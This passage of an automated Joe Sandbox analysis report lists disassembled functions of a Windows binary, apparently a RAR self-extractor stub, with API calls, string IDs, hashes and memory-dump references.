                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                    • Opcode ID: f2d4468960d83aef6d8dce8a0583c01c0faced0411496bad70476fa30d8f5f88
                                                                                                                    • Instruction ID: 66862df093529aa87bbde3e685f8a75fef7d2f1ab4ec7167e5808b610464fdfe
                                                                                                                    • Opcode Fuzzy Hash: f2d4468960d83aef6d8dce8a0583c01c0faced0411496bad70476fa30d8f5f88
                                                                                                                    • Instruction Fuzzy Hash: A741C6F1D08344BAEB30E7749C4AFEE7BAC9F44344F046455FA85B7182D674AA88CB21
                                                                                                                    Function 00E4B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E4B610
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E4B637
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E4B650
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E4B661
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00E4B66A
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E4B67E
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E4B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                    • String ID: LICENSEDLG
                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                    • Opcode ID: 0575cde5d719fad86b35748149f9be4c2a632f2f0fc360138da0224b6a4e4f69
                                                                                                                    • Instruction ID: c68bd1a2e24d677e4adade28167711be3e9205ce40e57dab37735d5d15969530
                                                                                                                    • Opcode Fuzzy Hash: 0575cde5d719fad86b35748149f9be4c2a632f2f0fc360138da0224b6a4e4f69
                                                                                                                    • Instruction Fuzzy Hash: F821D132604205BFD2119B77FC4AF7B3BADEB46B89F021056F604F20A0CB52DA099735
                                                                                                                    Function 00E4FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B0BD95E7,00000001,00000000,00000000,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FD99
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FE14
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E4FE1F
                                                                                                                    • _com_issue_error.COMSUPP ref: 00E4FE48
                                                                                                                    • _com_issue_error.COMSUPP ref: 00E4FE52
                                                                                                                    • GetLastError.KERNEL32(80070057,B0BD95E7,00000001,00000000,00000000,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FE57
                                                                                                                    • _com_issue_error.COMSUPP ref: 00E4FE6A
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00E3AF6C,ROOT\CIMV2), ref: 00E4FE80
                                                                                                                    • _com_issue_error.COMSUPP ref: 00E4FE93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: 71268352ba3ae95e6c3108815509fdfb94a89040aea5260936c11424d13444be
                                                                                                                    • Instruction ID: 6da51b79a95b590dedd1a20d8b20108e9c6a1e8de8cb9cfe8749a07b78c198e7
                                                                                                                    • Opcode Fuzzy Hash: 71268352ba3ae95e6c3108815509fdfb94a89040aea5260936c11424d13444be
                                                                                                                    • Instruction Fuzzy Hash: AC412871A00319AFCB109F69EC45BAFBBE8EB44B61F10523AF905F7291DB749904C7A4
                                                                                                                    Function 00E39382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E39387
                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E393AA
                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00E393C9
                                                                                                                      • Part of subcall function 00E3C29A: _wcslen.LIBCMT ref: 00E3C2A2
                                                                                                                      • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
                                                                                                                    • _swprintf.LIBCMT ref: 00E39465
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E394D4
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E39514
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: rtmp%d
                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                    • Opcode ID: 3bfc9721230822e62d2324c35d7ad7b1f3657384f997973ae30bf0688fda9d93
                                                                                                                    • Instruction ID: fc2829051c01f879908a33268798b14fda291b3b98f505ce9eddd1dcb06cc15a
                                                                                                                    • Opcode Fuzzy Hash: 3bfc9721230822e62d2324c35d7ad7b1f3657384f997973ae30bf0688fda9d93
                                                                                                                    • Instruction Fuzzy Hash: 764172B1900255B6DF21AB60DC49ADF7BBCAF50344F4058A5B649F3052DBB88BC9CB60
                                                                                                                    Function 00E31100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: U$p$z
                                                                                                                    • API String ID: 176396367-3999876168
                                                                                                                    • Opcode ID: 9b3a82453e47519091fa6f186149962c63965cde5e0d30ad16bc75b4ef29ed46
                                                                                                                    • Instruction ID: 5268f285e3fd085626394f5f6d1ad1e77e89aedbd3dbab7178c21acd6b46cbc8
                                                                                                                    • Opcode Fuzzy Hash: 9b3a82453e47519091fa6f186149962c63965cde5e0d30ad16bc75b4ef29ed46
                                                                                                                    • Instruction Fuzzy Hash: B041B4719006699FCB119F788C0A9EF7BB8EF00351F00106EFD46F7255DE30AE498AA1
                                                                                                                    Function 00E49ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00E49EEE
                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00E49F44
                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00E49FDB
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00E49FE3
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00E49FF9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                    • String ID: $RarHtmlClassName
                                                                                                                    • API String ID: 3937224194-266247588
                                                                                                                    • Opcode ID: 3d0184b6f60251e97d03110497fd819945be679a49fd58e0d183efcc15d102b9
                                                                                                                    • Instruction ID: 4a0cb4a3329c64958bd5d13119bf0fef71ce02d0ab1e23490bb193046a78bb4c
                                                                                                                    • Opcode Fuzzy Hash: 3d0184b6f60251e97d03110497fd819945be679a49fd58e0d183efcc15d102b9
                                                                                                                    • Instruction Fuzzy Hash: 9641AF31109310AFCB215FB6AC49B6BBBA8EF48715F04556AF849BA166CB34D908CB61
                                                                                                                    Function 00E41218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __aulldiv.LIBCMT ref: 00E4122E
                                                                                                                      • Part of subcall function 00E3B146: GetVersionExW.KERNEL32(?), ref: 00E3B16B
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00E41251
                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00E41263
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E41274
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41284
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41294
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00E412CF
                                                                                                                    • __aullrem.LIBCMT ref: 00E41379
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1247370737-0
                                                                                                                    • Opcode ID: 51e221c21d946c87f27b14ea5b43f953ad7594d8a5253d6d9097ec2897a2aa86
                                                                                                                    • Instruction ID: 0c852cc80c98b93ffb26853fa6c02ae35cad4b9f16f0053ed5511b301c3774e1
                                                                                                                    • Opcode Fuzzy Hash: 51e221c21d946c87f27b14ea5b43f953ad7594d8a5253d6d9097ec2897a2aa86
                                                                                                                    • Instruction Fuzzy Hash: 474146B2508305AFC710DF65D88496BBBF9FF88354F00892EF596D2210E774E649CB62
                                                                                                                    Function 00E32210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00E32536
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                      • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                    • Opcode ID: b49a7fb8fb7af9c906c645871762d42d29101f2e344f0799791f80a6eaf3777a
                                                                                                                    • Instruction ID: 167364a685a9d443c64fd89ba3d6f85b24738ed204f72ae359be0743a439094c
                                                                                                                    • Opcode Fuzzy Hash: b49a7fb8fb7af9c906c645871762d42d29101f2e344f0799791f80a6eaf3777a
                                                                                                                    • Instruction Fuzzy Hash: 75F104706083409BCB15DB28849DBEABFD96F94304F18256DEEC6BB283CB64D945C762
                                                                                                                    Function 00E49CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                    • Opcode ID: d9bede0c564889dc6ca0b49f07770dfb403496b4cc7acb611af79de620d26a09
                                                                                                                    • Instruction ID: 1a6911425c32343048882cab56ddaebf6a7b8c6ed8c41340bb5b8710578ab26d
                                                                                                                    • Opcode Fuzzy Hash: d9bede0c564889dc6ca0b49f07770dfb403496b4cc7acb611af79de620d26a09
                                                                                                                    • Instruction Fuzzy Hash: 37512A66B4032395DB309E65BC11B7773E0DFA1794F69242AFDC1BB1C2FB658C818261
                                                                                                                    Function 00E5F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E5FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00E5F6CF
                                                                                                                    • __fassign.LIBCMT ref: 00E5F74A
                                                                                                                    • __fassign.LIBCMT ref: 00E5F765
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E5F78B
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00E5FE02,00000000,?,?,?,?,?,?,?,?,?,00E5FE02,00000000), ref: 00E5F7AA
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,00E5FE02,00000000,?,?,?,?,?,?,?,?,?,00E5FE02,00000000), ref: 00E5F7E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: d6bcab5bb89e855f0b21b54ea5ef3894c89eab0c712564d2811eafd1948199f0
                                                                                                                    • Instruction ID: 6833babec0a85a8c5ac7fc888e5d65406f1024a2520e9587b2370a845c84f3ba
                                                                                                                    • Opcode Fuzzy Hash: d6bcab5bb89e855f0b21b54ea5ef3894c89eab0c712564d2811eafd1948199f0
                                                                                                                    • Instruction Fuzzy Hash: EC51C7B5D00209AFCB14CFA8DC45AEEBBF4EF09301F14556AE955F7251D770AA48CBA0
                                                                                                                    Function 00E4CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00E4CE9D
                                                                                                                      • Part of subcall function 00E3B690: _wcslen.LIBCMT ref: 00E3B696
                                                                                                                    • _swprintf.LIBCMT ref: 00E4CED1
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,00E7946A), ref: 00E4CEF1
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E4CF22
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E4CFFE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                    • String ID: %s%s%u
                                                                                                                    • API String ID: 689974011-1360425832
                                                                                                                    • Opcode ID: 456a9d3197ac43befe1f04ee36de7cefdf0c40c1e6fcd1bc6e2bcea9311825e5
                                                                                                                    • Instruction ID: a60d45a9c4185a84782d68cb97c08afc4fda9fc93800bed7616b37c64dc6a743
                                                                                                                    • Opcode Fuzzy Hash: 456a9d3197ac43befe1f04ee36de7cefdf0c40c1e6fcd1bc6e2bcea9311825e5
                                                                                                                    • Instruction Fuzzy Hash: 534170B1900258AADF21DB60EC45AEE77FCEB05344F5090A6FA09F7051EA749A88CF61
                                                                                                                    Function 00E52900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E52937
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E5293F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E529C8
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E529F3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E52A48
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 39d0344bd86f6c01c953b9147e825f71660b75a4bcd80d3b53b467e682987be0
                                                                                                                    • Instruction ID: 248b05d5cd0b7a34c3bf99abc504becba39b4a1fab2bf19a6b1fb1615cd90429
                                                                                                                    • Opcode Fuzzy Hash: 39d0344bd86f6c01c953b9147e825f71660b75a4bcd80d3b53b467e682987be0
                                                                                                                    • Instruction Fuzzy Hash: DD41F534A00208AFCF10DF68C880A9E7BF0AF46369F149959EE157B392C771DA09CF90
                                                                                                                    Function 00E49955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                    • Opcode ID: 57a23ed6e6246f4ad8c79e0c23593c69dca4699a15416224a7170e779af65b55
                                                                                                                    • Instruction ID: 68260e9dd34224ed6a832e0bd7feb9d4116b16c3e98d1772be2884c725ed6855
                                                                                                                    • Opcode Fuzzy Hash: 57a23ed6e6246f4ad8c79e0c23593c69dca4699a15416224a7170e779af65b55
